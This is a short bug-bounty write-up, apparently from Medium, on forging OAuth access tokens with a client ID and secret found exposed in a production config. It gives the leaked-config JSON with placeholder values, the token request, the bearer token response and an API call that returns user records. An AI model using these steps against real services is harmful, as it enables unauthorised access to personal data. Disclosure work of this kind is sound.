Forging OAuth tokens using discovered client id and client secret

Recon:

{
"ENV": "prod",
"SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
"SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
"MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
"MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
"SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};
Disclaimer: all values were replaced

What is OAuth?

Client Credentials Flow:

  1. Your app authenticates with the Auth0 Authorization Server using its Client ID and Client Secret (/oauth/token endpoint).
  2. Your Auth0 Authorization Server validates the Client ID and Client Secret.

Exploit:

POST /{identity url}/oauth/v1/token HTTP/1.1
Host: site.com
Authorization: Basic ehajnnsmnshjaknsjilkmnshtghjklikjWlOTno6VXdsQSgdhjnsmkjdhfbnnmkjshbnbhahsjkkluyhsghbshjnmkdjhead==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
grant_type=client_credentialsHTTP/1.1 200 OK
Date: Thu, 05 May 2022 21:15:28 GMT
Content-Type: application/json
Content-Length: 1008
Connection: close
Cache-Control: no-cache, no-store, no-transform
{"token_type":"bearer","access_token":"eyJ0[…redacted…]"}
POST /api/v1/users HTTP/1.1
Host: site.com
Authorization: Bearer eyJ0[…redacted…]
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
[...]
{
"username":”Name”,
"id":"BLALALALA",
"phone":"21254488"
{
"username":”Name”,
"id":"BLALALALA",
"phone":"21254488"

}

--

--

--

Cyber Security Engineer & Penetration Tester | Bug Bounty Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Battle Supremacy Hack Free Resources Generator

Archive vs Backup: What’s the difference and why it matters?

GitHub Hosts Infostealers Part 2: Cryptominers and Credit Card Stealers

0Chain is Integrating Band Protocol Oracles to Secure Decentralized Storage Layer

Three things that need to happen to scale the use of existing security information.

Cryptominers & Backdoors Found in Fake Plugins

{UPDATE} English Story Hack Free Resources Generator

From Equifax to Cambridge Analytica: Why financial services must stay ahead of the consumer data…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Basyouni

Basyouni

Cyber Security Engineer & Penetration Tester | Bug Bounty Hunter

More from Medium

Have Alternative L1s Lived Up to Their Promise?

T1 Cuzz LCK Fanterview with lckofficial, 2021.03.22

With Malice Toward None 1 with Tracy Silverman & Matthew Detrick

Automatic Updates = New Features and Security